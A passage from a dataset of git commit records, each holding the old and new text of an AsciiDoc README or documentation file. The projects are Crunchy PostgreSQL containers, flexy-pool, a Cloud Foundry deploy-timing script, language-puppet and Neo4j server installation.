Crunchy\nfor more details at http:\/\/www.crunchydata.com.\n\n=== Examples\n\nVarious examples are provided in link:docs\/examples.adoc[the Examples documentation] for running Docker,\nKubernetes, and OpenShift environments.\n\nYou will need to set up your environment as per the link:docs\/install.adoc[Install documentation] in order to\nexecute the examples.\n","old_contents":"== Crunchy PostgreSQL Containers\nv1.4.1, {docdate}\n\nimage::docs\/crunchy_logo.png?raw=true[]\n\n\nCrunchy Container Suite provides Docker containers that enable\nrapid deployment of PostgreSQL, including administration and\nmonitoring tools. Multiple styles of deploying PostgreSQL clusters\nare supported.\n\nThe containers will execute in the following environments:\n\n * Docker 1.12\n * Openshift 3.5\n * Kubernetes 1.6\n\nThe project includes the following containers:\n\n * link:docs\/containers.adoc#crunchy-postgres[crunchy-postgres] - executes Postgres\n * link:docs\/containers.adoc#crunchy-postgres-gis[crunchy-postgres-gis] - executes Postgres plus the PostGIS extensions\n * link:docs\/containers.adoc#crunchy-backup[crunchy-backup] - performs a full database backup\n * link:docs\/containers.adoc#crunchy-pgpool[crunchy-pgpool] - executes pgpool\n * link:docs\/containers.adoc#crunchy-pgbadger[crunchy-pgbadger] - executes pgbadger\n * link:docs\/containers.adoc#crunchy-watch[crunchy-watch] - performs a form of automated failover\n * link:docs\/metrics.adoc#crunchy-collect[crunchy-collect] - collects Postgres metrics\n * link:docs\/metrics.adoc#crunchy-prometheus[crunchy-prometheus] -stores Postgres metrics\n * link:docs\/metrics.adoc#crunchy-grafana[crunchy-grafana] - graphs Postgres metrics\n * link:docs\/containers.adoc#crunchy-pgbouncer[crunchy-pgbouncer] - pgbouncer connection pooler and simple form of failover\n * link:docs\/containers.adoc#crunchy-pgadmin4[crunchy-pgadmin4] - pgadmin4 web application\n * link:docs\/containers.adoc#crunchy-dba[crunchy-dba] - implements a cron scheduler to perform simple DBA tasks\n * link:docs\/containers.adoc#crunchy-upgrade[crunchy-upgrade] - allows you to perform a major postgres upgrade using pg_upgrade\n * link:docs\/containers.adoc#crunchy-backrest-restore[crunchy-backrest-restore] - allows you to perform a pgbackrest restore\n\n\nimage::docs\/containers.png?raw=true[]\n\nFor Kubernetes users of these containers, there is an associated\nproject worth taking a look at that uses the containers found\nin this repo and provides a higher level automation.\nThat project is link:https:\/\/github.com\/crunchydata\/postgres-operator[PostgresOperator]\n\n=== Installation\n\nComplete build and install documentation is found here: link:docs\/install.adoc[Install Docs]. The provided Dockerfiles build the containers\non a Centos 7 base image and use the community PostgreSQL RPMs.\n\nCrunchy provides a commercially supported version of these containers\nbuilt upon RHEL 7 and the Crunchy supported PostgreSQL. Contact Crunchy\nfor more details at http:\/\/www.crunchydata.com.\n\n=== Examples\n\nVarious examples are provided in link:docs\/examples.adoc[the Examples documentation] for running Docker,\nKubernetes, and OpenShift environments.\n\nYou will need to set up your environment as per the link:docs\/install.adoc[Install documentation] in order to\nexecute the examples.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eaedaaaa44a5dddb3330078fa72add8352616e91","subject":"Add user guide link","message":"Add user guide link\n","repos":"wgpshashank\/flexy-pool,mosoft521\/flexy-pool,vladmihalcea\/flexy-pool","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= flexy-pool\nAuthor <mih_vlad@yahoo.com>\nv1.0.0, 2014-02-25\n\n:toc:\n:imagesdir: images\n:homepage: http:\/\/vladmihalcea.com\/\n\n== Introduction\n\nThe flexy-pool library brings adaptability to a given Connection Pool, allowing it to resize on demand.\nThis is very handy since most connection pools offer a limited set of dynamic configuration strategies.\n\n== Features \n\n* extensive connection pool support(Bitronix TM, C3PO, DBCP 1, DBCP 2, BoneCP, HikariCP)\n* statistics support\n** source connection acquiring time histogram\n** total connection acquiring time histogram\n** retries attempts histogram\n** maximum CP size histogram\n** connection request count histogram\n** connection lease time histogram\n\nhttps:\/\/github.com\/vladmihalcea\/flexy-pool\/wiki\/Flexy-Pool-User-Guide[User Guide]\n\n== 1.0 TODO list\n\n* explain all configuration settings\n* explain jmx metrics\n* add real-life case study\n","old_contents":"= flexy-pool\nAuthor <mih_vlad@yahoo.com>\nv1.0.0, 2014-02-25\n\n:toc:\n:imagesdir: images\n:homepage: http:\/\/vladmihalcea.com\/\n\n== Introduction\n\nThe flexy-pool library brings adaptability to a given Connection Pool, allowing it to resize on demand.\nThis is very handy since most connection pools offer a limited set of dynamic configuration strategies.\n\n== Features \n\n* extensive connection pool support(Bitronix TM, C3PO, DBCP 1, DBCP 2, BoneCP, HikariCP)\n* statistics support\n** source connection acquiring time histogram\n** total connection acquiring time histogram\n** retries attempts histogram\n** maximum CP size histogram\n** connection request count histogram\n** connection lease time histogram\n\n== 1.0 TODO list\n\n* write installation guide\n* write user guide\n* explain jmx metrics\n* explain all configuration settings\n* add real-life case study\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b587d01d38918f1eacdc0458e00ae392e1b8f60e","subject":"Updated README with screenshots.","message":"Updated README with screenshots.\n","repos":"nevenc-pivotal\/pcf-environment-performance-test","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= pcf-environment-performance-test\n\nThis is a set of scripts to help you automate performance metrics of your PCF deployment process.\n\n\n== Install Script\n\nYou can simply clone the script to your Mac\/Unix\/Linux BASH environment, e.g.\n----\n git clone https:\/\/github.com\/nevenc-pivotal\/pcf-environment-performance-test.git\n cd pcf-environment-performance-test\n----\n\n\n== Configure Script\n\nIn order to make the script work, you need to configure separate directories for each environment, e.g.\n----\n emea ~\/.cf-emea\n corp ~\/.cf-corp\n pws ~\/.cf-pws\n myorg ~\/.cf-myorg\n ...\n----\n\nYou can set an environment by setting `CF_HOME` to specific environment, and setting target and login, repeat for each environment separately, e.g.\n\n----\n export CF_HOME=~\/cf-emea\n cf api --skip-ssl-validation https:\/\/api.cf.emea.pivotal.io\n cf login\n Email> you@emea.pivotal.io\n Password> **********\n \n export CF_HOME=~\/cf-corp\n cf api --skip-ssl-validation https:\/\/api.cf.corp.pivotal.io\n cf login\n Email> you@corp.pivotal.io\n Password> **********\n \n export CF_HOME=~\/cf-pws\n cf api https:\/\/api.run.pivotal.io\n cf login\n Email> you@email.com\n Password> **********\n \n export CF_HOME=~\/cf-myorg\n cf api --skip-ssl-validation https:\/\/api.cf.myorg.com\n cf login\n Email> you@email.com\n Password> **********\n\n----\n\n\n\n== Execute Script\n\nYou can execute script by invoking it directly, e.g.\n\n----\n.\/test_performance_deploy.sh\n\nPushing spring-music to emea\nreal 78.36\nuser 1.75\nsys 1.70\n\nRemoving spring-music from emea\nreal 9.05\nuser 0.07\nsys 0.02\n\nPushing spring-music to emea-2015\nreal 253.44\nuser 4.80\nsys 6.29\n\nRemoving spring-music from emea-2015\nreal 8.28\nuser 0.07\nsys 0.02\n\nPushing spring-music to pws\nreal 2.69\nuser 0.11\nsys 0.02\n\nRemoving spring-music from pws\nreal 0.59\nuser 0.10\nsys 0.02\n\n----\n\n\nYou can invoke test script multiple times by invoking the script runner with a number parameter, e.g.\n\n----\n.\/run_test_x_times.sh 2\n\nrun: 1\n\nPushing spring-music to emea\nreal 78.36\nuser 1.75\nsys 1.70\n\nRemoving spring-music from emea\nreal 9.05\nuser 0.07\nsys 0.02\n\nPushing spring-music to emea-2015\nreal 253.44\nuser 4.80\nsys 6.29\n\nRemoving spring-music from emea-2015\nreal 8.28\nuser 0.07\nsys 0.02\n\nPushing spring-music to pws\nreal 2.69\nuser 0.11\nsys 0.02\n\nRemoving spring-music from pws\nreal 0.59\nuser 0.10\nsys 0.02\n\n\n\nrun: 2\n\nPushing spring-music to emea\nreal 58.17\nuser 1.46\nsys 1.21\n\nRemoving spring-music from emea\nreal 9.17\nuser 0.07\nsys 0.02\n\nPushing spring-music to emea-2015\nreal 236.64\nuser 4.51\nsys 5.86\n\nRemoving spring-music from emea-2015\nreal 8.14\nuser 0.07\nsys 0.02\n\nPushing spring-music to pws\nreal 1.85\nuser 0.12\nsys 0.02\n\nRemoving spring-music from pws\nreal 0.57\nuser 0.11\nsys 0.02\n\n----\n\n\n== Results\n\nYou can feed the results into a spreadsheet for nicer presentation, e.g.\n\n![cf push response times](cf_push.png?raw=true \"cf push response times\")\n![cf delete response times](cf_delete.png?raw=true \"cf delete response times\")\n\n\n\n","old_contents":"= pcf-environment-performance-test\n\nThis is a set of scripts to help you automate performance metrics of your PCF deployment process.\n\n\n== Install Script\n\nYou can simply clone the script to your Mac\/Unix\/Linux BASH environment, e.g.\n----\n git clone https:\/\/github.com\/nevenc-pivotal\/pcf-environment-performance-test.git\n cd pcf-environment-performance-test\n----\n\n\n== Configure Script\n\nIn order to make the script work, you need to configure separate directories for each environment, e.g.\n----\n emea ~\/.cf-emea\n corp ~\/.cf-corp\n pws ~\/.cf-pws\n myorg ~\/.cf-myorg\n ...\n----\n\nYou can set an environment by setting `CF_HOME` to specific environment, and setting target and login, repeat for each environment separately, e.g.\n\n----\n export CF_HOME=~\/cf-emea\n cf api --skip-ssl-validation https:\/\/api.cf.emea.pivotal.io\n cf login\n Email> you@emea.pivotal.io\n Password> **********\n \n export CF_HOME=~\/cf-corp\n cf api --skip-ssl-validation https:\/\/api.cf.corp.pivotal.io\n cf login\n Email> you@corp.pivotal.io\n Password> **********\n \n export CF_HOME=~\/cf-pws\n cf api https:\/\/api.run.pivotal.io\n cf login\n Email> you@email.com\n Password> **********\n \n export CF_HOME=~\/cf-myorg\n cf api --skip-ssl-validation https:\/\/api.cf.myorg.com\n cf login\n Email> you@email.com\n Password> **********\n----\n\n== Execute Script\n\nYou can execute script by invoking it directly, e.g.\n\n----\n.\/test_performance_deploy.sh\n\nPushing spring-music to emea\nreal 78.36\nuser 1.75\nsys 1.70\n\nRemoving spring-music from emea\nreal 9.05\nuser 0.07\nsys 0.02\n\nPushing spring-music to emea-2015\nreal 253.44\nuser 4.80\nsys 6.29\n\nRemoving spring-music from emea-2015\nreal 8.28\nuser 0.07\nsys 0.02\n\nPushing spring-music to pws\nreal 2.69\nuser 0.11\nsys 0.02\n\nRemoving spring-music from pws\nreal 0.59\nuser 0.10\nsys 0.02\n\n----\n\n\nYou can invoke test script multiple times by invoking the script runner with a number parameter, e.g.\n\n----\n.\/run_test_x_times.sh 2\n\n\n.\/run_test_x_times.sh\n\nrun: 1\n\nPushing spring-music to emea\nreal 78.36\nuser 1.75\nsys 1.70\n\nRemoving spring-music from emea\nreal 9.05\nuser 0.07\nsys 0.02\n\nPushing spring-music to emea-2015\nreal 253.44\nuser 4.80\nsys 6.29\n\nRemoving spring-music from emea-2015\nreal 8.28\nuser 0.07\nsys 0.02\n\nPushing spring-music to pws\nreal 2.69\nuser 0.11\nsys 0.02\n\nRemoving spring-music from pws\nreal 0.59\nuser 0.10\nsys 0.02\n\n\nrun: 2\n\nPushing spring-music to emea\nreal 58.17\nuser 1.46\nsys 1.21\n\nRemoving spring-music from emea\nreal 9.17\nuser 0.07\nsys 0.02\n\nPushing spring-music to emea-2015\nreal 236.64\nuser 4.51\nsys 5.86\n\nRemoving spring-music from emea-2015\nreal 8.14\nuser 0.07\nsys 0.02\n\nPushing spring-music to pws\nreal 1.85\nuser 0.12\nsys 0.02\n\nRemoving spring-music from pws\nreal 0.57\nuser 0.11\nsys 0.02\n\n----\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1d1c450170b207d35c6bda52c17e26a21bb2377c","subject":"Doc: README cleanup","message":"Doc: README cleanup\n","repos":"bartavelle\/language-puppet,bartavelle\/language-puppet","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Language-puppet\n\nA library to work with Puppet manifests, test them and eventually replace everything ruby.\n\n.Basic usage:\n```\npuppetresources -p \/where\/your\/puppet\/files\/are -o node.name.com\n```\n\n.Easy build instructions:\n```\ncd language-puppet\ncabal update\ncabal sandbox init\ncabal install -j -p\n```\n\nThere are also http:\/\/lpuppet.banquise.net\/download\/[binary packages available] .\n\n== Puppetresources\n\nThe `puppetresources` command is a command line utility that let you interactively compute catalogs on your local computer. It will then display them on screen, in a nice,\nuser-friendly colored fashion. It is much faster than its ruby counterpart, and has been designed for giving assistance to the Puppet catalog writer. Here is a list of command line\narguments :\n\n`-p` or `--puppetdir`::\n\nThis is the only mandatory argument. It accepts a directory or file path as the argument. In the absence of `-o`, it will parse and display the puppet file given as a parameter.\nWith `-o` it must point to the base of the puppet directory (the directory that contains the `modules` and `manifests` directories).\n\n`-o` or `--node`::\n\nThis let you specify the name of the node you wish to compute the catalog for.\n+\nIf you use `allnodes` as the node name, it will compute the catalogs for all nodes that are specified in `site.pp` (this will not work for regexp-specified or the default nodes). This is useful\nfor writing automated tests, to check a change didn't break something.\n+\nIf you use `deadcode` as the node name, it will also compute the catalogs for all nodes, but will display the list of puppet files that have not been used, and that might be\ndeprecated.\n+\nYou might want to run the program with `+RTS -N` with those two modes.\n\n`-t` or `--type`::\n\nFilters the resources of the resulting catalog by type, but specifying a regular expression. Only the resources whose types match the submitted regexp will be displayed.\n\n`-n` or `--name`::\n\nFilters the resources of the resulting catalog by name, but specifying a regular expression. Only the resources whose names match the submitted regexp will be displayed.\n\n`-c` or `--showcontent`::\n\nIf `-n` is the exact name of a file type resource defined in the catalog, this will display more nicely display the file content. Useful for debugging templates.\n+\nExample: `puppetresources -p . -o mynodename -n '\/etc\/motd' --showcontent`\n\n`--loglevel` or `-v`::\n\nPossible values are : DEBUG, INFO, NOTICE, WARNING, ERROR, CRITICAL, ALERT, EMERGENCY.\n\n`--pdburl`::\n\nExpects the url of a live PuppetDB.\n\n`--pdbfile`::\n\nExpects a path to a *fake* PuppetDB, represented as a YAML file on disk. This option is pretty slow but can be invaluable to test exported resources tricks.\n\n`--hiera`::\n\nExpects the path to the `hiera.yaml` file.\n\n`--ignoremodules`::\n\nExpects a list of comma-separated modules. The interpreter will not try to evaluate the defined types and classes from this module. This is useful for using modules that use bad\npractices forbidden by `puppetresources`.\n\n`--nousergrouptest`::\n\nBy default, `puppetresources` will check that all users and groups referenced by `cron`, `file`, etc. types are defined somewhere in the catalog (except for a list of widely\navailable users, such as `root`). This flag disables these tests.\n\n`--commitdb`::\n\nWhen this flag is set, exported resources, catalogs and facts are saved in the PuppetDB. This is useful in conjunction with `--pdbfile`.\n\n`--checkExported`::\n\nWhen this flag is set, exported resources are saved in the PuppetDB. This is useful in conjunction with `--pdbfile`.\n\n`-j` or `--JSON`::\n\nDisplays the catalog as a Puppet-compatible JSON file, that can then be used with `puppet apply`.\n\n`--facts-override` and `--facts-defaults`::\n\nBoth options expect a path to a YAML file defining facts. The first option will override the facts that are collected locally, while the second will merely provide default values\nfor them.\n\n`--strict`::\n\nEnable strict mode.\nThe strict mode is less permissive than vanilla Puppet.\nIt is meant to prevent some pitfalls by enforcing good practices.\nFor instance it refuses to silently ignore\/convert `undef` variables.\n\n\n== pdbQuery\n\nThe `pdbQuery` command is used to work with different implementations of PuppetDB (the official one with its HTTP API, the file-based backend and dummy ones). Its main use is to\nexport data from production PuppetDB to a file in order to debug some issue with `puppetresources`. Here is a list of command line arguments :\n\n`-l` or `--location`::\n\nThe URL of the PuppetDB when working with a remote PuppetDB, a file path when working with the file-based test implementation.\n\n`-t` or `--pdbtype`::\n\nThe type of PuppetDB to work with:\n\n* dummy: a dummy PuppetDB.\n* remote: a \"real\" PuppetDB, accessed by its HTTP API.\n* test: a file-based backend emulating a PuppetDB.\n\n.Commands\n`dumpfacts`::\n\nDump all facts, and store them in `\/tmp\/allfacts.yaml`.\n\n`nodes`::\n\nDump all nodes\n\n`snapshot`::\n\nCreate a test DB from the current DB\n\n`addfacts`::\n\nAdds facts to the test DB for the given node name, if they are not already defined.\n\n== Unsupported Puppet idioms or features\n\npuppet functions::\n * the `require` function is not supported (see https:\/\/github.com\/bartavelle\/language-puppet\/issues\/17[issue #17])\n * the deprecated `import` function is not supported (see https:\/\/github.com\/bartavelle\/language-puppet\/issues\/82[issue #82])\n\ncustom ruby functions::\nCurrently the only way to support your custom ruby functions is to rewrite them in Lua.\n\nknown differences::\nLooking up an undef key is silent in Puppet but it is an error with puppetresources.\n","old_contents":"= Language-puppet\n\nA library to work with Puppet manifests, test them and eventually replace everything ruby.\n\n.Basic usage:\n```\npuppetresources -p \/where\/your\/puppet\/files\/are -o node.name.com\n```\n\n.Easy build instructions:\n```\ncd language-puppet\ncabal update\ncabal sandbox init\ncabal install -j -p\n```\n\nThere are also http:\/\/lpuppet.banquise.net\/download\/[binary packages available] .\n\n== Puppetresources\n\nThe `puppetresources` command is a command line utility that let you interactively compute catalogs on your local computer. It will then display them on screen, in a nice,\nuser-friendly colored fashion. It is much faster than its ruby counterpart, and has been designed for giving assistance to the Puppet catalog writer. Here is a list of command line\narguments :\n\n`-p` or `--puppetdir`::\n\nThis is the only mandatory argument. It accepts a directory or file path as the argument. In the absence of `-o`, it will parse and display the puppet file given as a parameter.\nWith `-o` it must point to the base of the puppet directory (the directory that contains the `modules` and `manifests` directories).\n\n`-o` or `--node`::\n\nThis let you specify the name of the node you wish to compute the catalog for.\n+\nIf you use `allnodes` as the node name, it will compute the catalogs for all nodes that are specified in `site.pp` (this will not work for regexp-specified or the default nodes). This is useful\nfor writing automated tests, to check a change didn't break something.\n+\nIf you use `deadcode` as the node name, it will also compute the catalogs for all nodes, but will display the list of puppet files that have not been used, and that might be\ndeprecated.\n+\nYou might want to run the program with `+RTS -N` with those two modes.\n\n`-t` or `--type`::\n\nFilters the resources of the resulting catalog by type, but specifying a regular expression. Only the resources whose types match the submitted regexp will be displayed.\n\n`-n` or `--name`::\n\nFilters the resources of the resulting catalog by name, but specifying a regular expression. Only the resources whose names match the submitted regexp will be displayed.\n\n`-c` or `--showcontent`::\n\nIf `-n` is the exact name of a file type resource defined in the catalog, this will display more nicely display the file content. Useful for debugging templates.\nEx: puppetresources -p . -o mynodename -n '\/etc\/motd' --showcontent\n\n`--loglevel` or `-v`::\n\nExpects a log level. Possible values are : DEBUG, INFO, NOTICE, WARNING, ERROR, CRITICAL, ALERT, EMERGENCY.\n\n`--pdburl`::\n\nExpects the url of a live PuppetDB.\n\n`--pdbfile`::\n\nExpects a path to a *fake* PuppetDB, represented as a YAML file on disk. This option is pretty slow but can be invaluable to test exported resources tricks.\n\n`--hiera`::\n\nExpects the path to the `hiera.yaml` file.\n\n`--ignoremodules`::\n\nExpects a list of comma-separated modules. The interpreter will not try to evaluate the defined types and classes from this module. This is useful for using modules that use bad\npractices forbidden by `puppetresources`.\n\n`--nousergrouptest`::\n\nBy default, `puppetresources` will check that all users and groups referenced by `cron`, `file`, etc. types are defined somewhere in the catalog (except for a list of widely\navailable users, such as `root`). This flag disables these tests.\n\n`--commitdb`::\n\nWhen this flag is set, exported resources, catalogs and facts are saved in the PuppetDB. This is useful in conjunction with `--pdbfile`.\n\n`--checkExported`::\n\nWhen this flag is set, exported resources are saved in the PuppetDB. This is useful in conjunction with `--pdbfile`.\n\n`-j` or `--JSON`::\n\nDisplays the catalog as a Puppet-compatible JSON file, that can then be used with `puppet apply`.\n\n`--facts-override` and `--facts-defaults`::\n\nBoth options expect a path to a YAML file defining facts. The first option will override the facts that are collected locally, while the second will merely provide default values\nfor them.\n\n`--strict`::\n\nEnable strict mode.\nThe strict mode is less permissive than vanilla Puppet.\nIt is meant to prevent some pitfalls by enforcing good practices.\nFor instance it refuses to silently ignore\/convert `undef` variables.\n\n\n== pdbQuery\n\nThe `pdbQuery` command is used to work with different implementations of PuppetDB (the official one with its HTTP API, the file-based backend and dummy ones). Its main use is to\nexport data from production PuppetDB to a file in order to debug some issue with `puppetresources`. Here is a list of command line arguments :\n\n`-l` or `--location`::\n\nThe URL of the PuppetDB when working with a remote PuppetDB, a file path when working with the file-based test implementation.\n\n`-t` or `--pdbtype`::\n\nThe type of PuppetDB to work with:\n\n* dummy: a dummy PuppetDB.\n* remote: a \"real\" PuppetDB, accessed by its HTTP API.\n* test: a file-based backend emulating a PuppetDB.\n\n.Commands\n`dumpfacts`::\n\nDump all facts, and store them in `\/tmp\/allfacts.yaml`.\n\n`nodes`::\n\nDump all nodes\n\n`snapshot`::\n\nCreate a test DB from the current DB\n\n`addfacts`::\n\nAdds facts to the test DB for the given node name, if they are not already defined.\n\n== Unsupported Puppet idioms or features\n\npuppet functions::\n * the `require` function is not supported (see https:\/\/github.com\/bartavelle\/language-puppet\/issues\/17[issue #17])\n * the deprecated `import` function is not supported (see https:\/\/github.com\/bartavelle\/language-puppet\/issues\/82[issue #82])\n\ncustom ruby functions::\nCurrently the only way to support your custom ruby functions is to rewrite them in Lua.\n\nknown differences::\nLooking up an undef key is silent in Puppet but it is an error with puppetresources.\n","returncode":0,"stderr":"","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"fdce4a9b4ea74abd41dc4fabed5292dc0c7cf63e","subject":"Fix typo in installation docs","message":"Fix typo in installation docs\n","repos":"HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j","old_file":"community\/server\/src\/docs\/ops\/server-installation.asciidoc","new_file":"community\/server\/src\/docs\/ops\/server-installation.asciidoc","new_contents":"[[server-installation]]\n= Server Installation\n\n== Deployment Scenarios ==\n\nAs a developer, you may wish to download Neo4j and run it locally on your desktop computer.\nWe recommend this as an easy way to discover Neo4j.\n\n* For Windows, see <<windows-install>>.\n* For Unix\/Linux, see <<linux-install>>.\n* For OSX, see <<osx-install>>.\n\nAs a systems administrator, you may wish to install Neo4j using a packaging system so you can ensure that a cluster of machines have identical installs.\nSee <<linux-packages>> for more information on this.\n\nFor information on High Availability, please refer to <<ha>>.\n\n== Prerequisites ==\n\nWith the exception of our Windows and Mac Installers, you'll need a Java Virtual Machine installed on your computer.\nWe recommend that you install http:\/\/openjdk.java.net\/[OpenJDK 8 (preferred) or 7] or http:\/\/www.oracle.com\/technetwork\/java\/javase\/downloads\/index.html[Oracle Java 8 (preferred) or 7].\n\n[[server-permissions]]\n== Setting Proper File Permissions ==\n\nWhen installing Neo4j Server, keep in mind that the _bin\/neo4j_ executable will need to be run by some OS system user, and that user will need write permissions to some files\/directories.\nThis goes specifically for the _data\/graph.db_ directory.\nThat user will also need execute permissions on other files, such as those in _bin\/_.\n\nIt is recommended to either choose or create a user who will own and manage the Neo4j Server.\nThis user should own the entire Neo4j directory, so make sure to untar\/unzip it as this user and not with `sudo` (UNIX\/Linux\/OSx) etc.\n\nIf _data\/graph.db_ is not writable by the user Neo4j won't be able to write anything either to the store or its log files.\nAs a result any logs would be appended to _console.log_.\nThe following error message would indicate a possible permissions issue: `Write transactions to database disabled`.\n\n[[windows-install]]\n== Windows ==\n\n[[windows-installer]]\n=== Windows Installer ===\n\n1. Download the version that you want from http:\/\/neo4j.com\/download\/.\n * Select the appropriate version and architecture for your platform.\n2. Double-click the downloaded installer file.\n3. Follow the prompts.\n\n[NOTE]\nThe installer will prompt to be granted Administrator privileges.\nNewer versions of Windows come with a SmartScreen feature that may prevent the installer from running -- you can make it run anyway by clicking \"More info\" on the \"Windows protected your PC\" screen.\n\n[TIP]\nIf you install Neo4j using the windows installer and you already have an existing instance of Neo4j the installer will select a new install directory by default.\nIf you specify the same directory it will ask if you want to upgrade.\nThis should proceed without issue although some users have reported a `JRE is damaged` error.\nIf you see this error simply install Neo4j into a different location.\n\n[[windows-console]]\n=== Windows Console Application ===\n1. Download the latest release from http:\/\/neo4j.com\/download\/.\n * Select the appropriate Zip distribution.\n2. Right-click the downloaded file, click Extract All.\n * Refer to the top-level extracted directory as: +NEO4J_HOME+\n3. Consult <<powershell>> for how to start or install Neo4j.\n\n[NOTE]\nSome users have reported problems on Windows when using the ZoneAlarm firewall.\nIf you are having problems getting large responses from the server, or if the web interface does not work, try disabling ZoneAlarm.\nContact ZoneAlarm support to get information on how to resolve this.\n\n[[linux-install]]\n== Linux ==\n\n[[linux-packages]]\n=== Linux Packages ===\n\n* For Debian packages, see the instructions at http:\/\/debian.neo4j.org\/.\n\nAfter installation you may have to do some platform specific configuration and performance tuning.\nFor that, refer to <<performance-guide>>.\n\n[[unix-console]]\n=== Unix Console Application ===\n\n1. Download the latest release from http:\/\/neo4j.com\/download\/.\n * Select the appropriate tar.gz distribution for your platform.\n2. Extract the contents of the archive, using: `tar -xf <filename>`\n * Refer to the top-level extracted directory as: +NEO4J_HOME+\n3. Change directory to: `$NEO4J_HOME`\n * Run: `.\/bin\/neo4j console`\n4. Stop the server by typing Ctrl-C in the console.\n\n=== Linux Service ===\n\nThe `neo4j` command can also be used with `start`, `stop`, `restart` or `status` instead of `console`.\nBy using these actions, you can create a Neo4j service.\nSee the <<neo4j-manpage,neo4j man page>> for further details.\n\n[CAUTION]\nThis approach to running Neo4j as a service is deprecated.\nWe strongly advise you to run Neo4j from a package where feasible.\n\nYou can build your own `init.d` script.\nSee for instance the Linux Standard Base specification on http:\/\/refspecs.linuxfoundation.org\/LSB_3.1.0\/LSB-Core-generic\/LSB-Core-generic\/tocsysinit.html[system initialization], or one of the many https:\/\/gist.github.com\/chrisvest\/7673244[samples] and http:\/\/www.linux.com\/learn\/tutorials\/442412-managing-linux-daemons-with-init-scripts[tutorials].\n\n[[osx-install]]\n== Mac OSX ==\n\n=== Mac OSX Installer ===\n\n1. Download the _.dmg_ installer that you want from http:\/\/neo4j.com\/download\/.\n2. Click the downloaded installer file.\n3. Drag the Neo4j icon into the Applications folder.\n\n[TIP]\nIf you install Neo4j using the Mac installer and already have an existing instance of Neo4j the installer will ensure that both the old and new versions can co-exist on your system.\n\n=== Running Neo4j from the Terminal ===\n\nThe server can be started in the background from the terminal with the command `neo4j start`, and then stopped again with `neo4j stop`.\nThe server can also be started in the foreground with `neo4j console` -- then it's log output will be printed to the terminal.\n\nThe `neo4j-shell` command can be used to interact with Neo4j from the command line using Cypher. It will automatically connect to any\nserver that is running on localhost with the default port, otherwise it will show a help message. You can alternatively start the\nshell with an embedded Neo4j instance, by using the `-path path\/to\/data` argument -- note that only a single instance of Neo4j\ncan access the database files at a time.\n\n=== OSX Service ===\n\nUse the standard OSX system tools to create a service based on the `neo4j` command.\n\n=== A note on Java on OS X Mavericks ===\n\nUnlike previous versions, OS X Mavericks does not come with Java pre-installed. You might encounter that the first time you run Neo4j, where OS X will trigger a popup offering you to install Java SE 6.\n\nJava SE 6 is incompatible with Neo4j {neo4j-version}, so we strongly advise you to skip installing Java SE 6 if you have no other uses for it. Instead, for Neo4j {neo4j-version} we recommend you install Java SE 8 (preferred) or 7 from Oracle (http:\/\/www.oracle.com\/technetwork\/java\/javase\/downloads\/index.html) as that is what we support for production use.\n\n== Multiple Server instances on one machine ==\n\nNeo4j can be set up to run as several instances on one machine, providing for instance several databases for development.\n\nFor how to set this up, see <<ha-local-cluster>>.\nJust use the Neo4j edition of your choice, follow the guide and remember to not set the servers to run in HA mode.\n","old_contents":"[[server-installation]]\n= Server Installation\n\n== Deployment Scenarios ==\n\nAs a developer, you may wish to download Neo4j and run it locally on your desktop computer.\nWe recommend this as an easy way to discover Neo4j.\n\n* For Windows, see <<windows-install>>.\n* For Unix\/Linux, see <<linux-install>>.\n* For OSX, see <<osx-install>>.\n\nAs a systems administrator, you may wish to install Neo4j using a packaging system so you can ensure that a cluster of machines have identical installs.\nSee <<linux-packages>> for more information on this.\n\nFor information on High Availability, please refer to <<ha>>.\n\n== Prerequisites ==\n\nWith the exception of our Windows and Mac Installers, you'll need a Java Virtual Machine installed on your computer.\nWe recommend that you install http:\/\/openjdk.java.net\/[OpenJDK 8 (preferred) or 7] or http:\/\/www.oracle.com\/technetwork\/java\/javase\/downloads\/index.html[Oracle Java 8 (preferred) or 7].\n\n[[server-permissions]]\n== Setting Proper File Permissions ==\n\nWhen installing Neo4j Server, keep in mind that the _bin\/neo4j_ executable will need to be run by some OS system user, and that user will need write permissions to some files\/directories.\nThis goes specifically for the _data\/graph.db_ directory.\nThat user will also need execute permissions on other files, such as those in _bin\/_.\n\nIt is recommended to either choose or create a user who will own and manage the Neo4j Server.\nThis user should own the entire Neo4j directory, so make sure to untar\/unzip it as this user and not with `sudo` (UNIX\/Linux\/OSx) etc.\n\nIf _data\/graph.db_ is not writable by the user Neo4j won't be able to write anything either to the store or its log files.\nAs a result any logs would be appended to _console.log_.\nThe following error message would indicate a possible permissions issue: `Write transactions to database disabled`.\n\n[[windows-install]]\n== Windows ==\n\n[[windows-installer]]\n=== Windows Installer ===\n\n1. Download the version that you want from http:\/\/neo4j.com\/download\/.\n * Select the appropriate version and architecture for your platform.\n2. Double-click the downloaded installer file.\n3. Follow the prompts.\n\n[NOTE]\nThe installer will prompt to be granted Administrator privileges.\nNewer versions of Windows come with a SmartScreen feature that may prevent the installer from running -- you can make it run anyway by clicking \"More info\" on the \"Windows protected your PC\" screen.\n\n[TIP]\nIf you install Neo4j using the windows installer and you already have an existing instance of Neo4j the installer will select a new install directory by default.\nIf you specify the same directory it will ask if you want to upgrade.\nThis should proceed without issue although some users have reported a `JRE is damaged` error.\nIf you see this error simply install Neo4j into a different location.\n\n[[windows-console]]\n=== Windows Console Application ===\n1. Download the latest release from http:\/\/neo4j.com\/download\/.\n * Select the appropriate Zip distribution.\n2. Right-click the downloaded file, click Extract All.\n * Refer to the top-level extracted directory as: +NEO4J_HOME+\n3. Consult <<powershell>> for how to start or install Neo4j.\n\n[NOTE]\nSome users have reported problems on Windows when using the ZoneAlarm firewall.\nIf you are having problems getting large responses from the server, or if the web interface does not work, try disabling ZoneAlarm.\nContact ZoneAlarm support to get information on how to resolve this.\n\n[[linux-install]]\n== Linux ==\n\n[[linux-packages]]\n=== Linux Packages ===\n\n* For Debian packages, see the instructions at http:\/\/debian.neo4j.org\/.\n\nAfter installation you may have to do some platform specific configuration and performance tuning.\nFor that, refer to 